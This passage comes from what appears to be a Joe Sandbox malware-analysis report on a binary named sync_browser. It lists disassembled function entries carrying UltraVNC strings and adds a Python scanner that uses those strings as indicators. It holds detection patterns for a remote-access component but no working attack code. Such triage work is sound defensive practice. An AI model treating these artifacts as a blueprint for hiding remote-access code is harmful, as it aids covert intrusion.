                                                                      • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                      • Instruction ID: 7af49f32d99627b76fa1b3551ba738d20a1af642f6a4f156add7a898980be9cc
                                                                      • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                      • Instruction Fuzzy Hash: C7018F33508BC582E7609B28F41136AF7A0E744B74F948335E6BA426E8DF7CC490C721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessageObjectSendSingleWait
                                                                      • String ID: vncclient.cpp : client Kill() called
                                                                      • API String ID: 353115698-1198714380
                                                                      • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                      • Instruction ID: f312a061da74ba03b0872a2af2c9b547ccd3f36cf02330cbe0d46a5bb84453b9
                                                                      • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                      • Instruction Fuzzy Hash: A401843260458981FB58EF35E4657A9A360EF84F64F844332D73C866D9CF38D494C392
                                                                      APIs
                                                                      Strings
                                                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF7E507678B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpen
                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                      • API String ID: 47109696-713323490
                                                                      • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                      • Instruction ID: 047d8b64c85204cf5dc99fb6324e3f8490b87ac12df5f1b22558766bee909760
                                                                      • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                      • Instruction Fuzzy Hash: 03F0FC21A1864181DB109B34E41436AE374FF54F94F941036DA4D477A8EF7DC084C716
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: getpeernameinet_ntoa
                                                                      • String ID: <unavailable>
                                                                      • API String ID: 1982201544-1096956887
                                                                      • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                      • Instruction ID: 95c9c8dbbeac6e399d16bdf514139273657b29b4bbab0361524648393d051d9e
                                                                      • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                      • Instruction Fuzzy Hash: 97F0127561874986EB60AB10F4612A9B360FB88B58FC01536E54D46728DF3CE105CB11
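The string artifacts attached to the function entries above (the WindowsScreenSaverClass window class name, the {34F673E0-878F-11D5-B98A-00B0D07B8C7C} file-mapping GUID, the vncclient.cpp Kill() log line, the Hotfix\Q246009 registry key and the <unavailable> peer-name placeholder) are usable as static indicators for this UltraVNC build. The Python below is an added example and is not part of the Joe Sandbox report or of UltraVNC's code: it scans a buffer for those strings in both the narrow and the UTF-16LE form a Win32 binary may carry and applies a two-indicator threshold. The sample buffer and the threshold are constructed for the illustration, not taken from the analysed sample.

```python
# Added example: turn the string artifacts listed in the function entries
# above into a simple byte-level indicator scan. The indicator strings come
# from the report; the sample blob and the threshold are constructed here.
from __future__ import annotations

# Strings observed in the disassembly entries (ASCII as they appear).
INDICATORS = {
    "screensaver_class": b"WindowsScreenSaverClass",
    "file_mapping_guid": b"{34F673E0-878F-11D5-B98A-00B0D07B8C7C}",
    "vncclient_kill_log": b"vncclient.cpp : client Kill() called",
    "hotfix_q246009_key": b"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Hotfix\\Q246009",
    "peer_unavailable": b"<unavailable>",
}


def _all_offsets(data: bytes, needle: bytes) -> list[int]:
    """Return every offset at which needle occurs in data (overlaps allowed)."""
    offsets: list[int] = []
    start = 0
    while True:
        idx = data.find(needle, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1


def scan_indicators(data: bytes) -> dict[str, dict[str, list[int]]]:
    """Scan a buffer for each indicator in the narrow (ASCII) and the wide
    (UTF-16LE) encoding that Win32 binaries commonly carry.

    Returns {indicator_name: {"ascii": [offsets], "utf16le": [offsets]}}
    for every indicator found at least once in either encoding.
    """
    hits: dict[str, dict[str, list[int]]] = {}
    for name, needle in INDICATORS.items():
        ascii_hits = _all_offsets(data, needle)
        wide_hits = _all_offsets(data, needle.decode("ascii").encode("utf-16-le"))
        if ascii_hits or wide_hits:
            hits[name] = {"ascii": ascii_hits, "utf16le": wide_hits}
    return hits


def is_probable_ultravnc(data: bytes, min_distinct: int = 2) -> bool:
    """Constructed triage rule: require at least min_distinct different
    indicators so that a lone generic string such as "<unavailable>"
    does not fire on its own."""
    return len(scan_indicators(data)) >= min_distinct


# Constructed sample buffer, not a real memory dump: filler bytes around a
# narrow copy of the GUID, a wide copy of the screensaver class name and
# the generic "<unavailable>" marker.
SAMPLE_BLOB = (
    b"\x00" * 16
    + b"{34F673E0-878F-11D5-B98A-00B0D07B8C7C}"
    + b"\x90" * 8
    + "WindowsScreenSaverClass".encode("utf-16-le")
    + b"\x00" * 4
    + b"<unavailable>"
)

# A buffer that carries only the generic marker must not be flagged.
BENIGN_BLOB = b"status: <unavailable>\x00" + b"\xcc" * 32

if __name__ == "__main__":
    for name, encodings in scan_indicators(SAMPLE_BLOB).items():
        print(name, encodings)
    print("probable UltraVNC:", is_probable_ultravnc(SAMPLE_BLOB))
    print("benign flagged:", is_probable_ultravnc(BENIGN_BLOB))
```

A match identifies the UltraVNC component, not intent: legitimately deployed UltraVNC servers carry the same strings, so the scan is a triage aid to pair with where the binary sits on disk and how it was started, not a verdict on its own.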
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                      • String ID:
                                                                      • API String ID: 1225357528-0
                                                                      • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                      • Instruction ID: 23bfc82c3f249ba77a3999dfbbbf93e0427fdaec6d47f8a9d4a11122c1f06bc3
                                                                      • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                      • Instruction Fuzzy Hash: 0D115151B1C28A82EE44B666B26137E9251AF84FC0F945032FA4EC778BDE3DD4824716
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                       • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      • Opcode ID: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                                      • Instruction ID: 5b5f19a9e074b78df117916adc87f461b53d91afe47539c2a744cf604a18f417
                                                                      • Opcode Fuzzy Hash: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                                      • Instruction Fuzzy Hash: 6F211E31A19A4EC6EB50BF24E4A0369B360FF44F48FA41132DA4E83659DF3CD845C762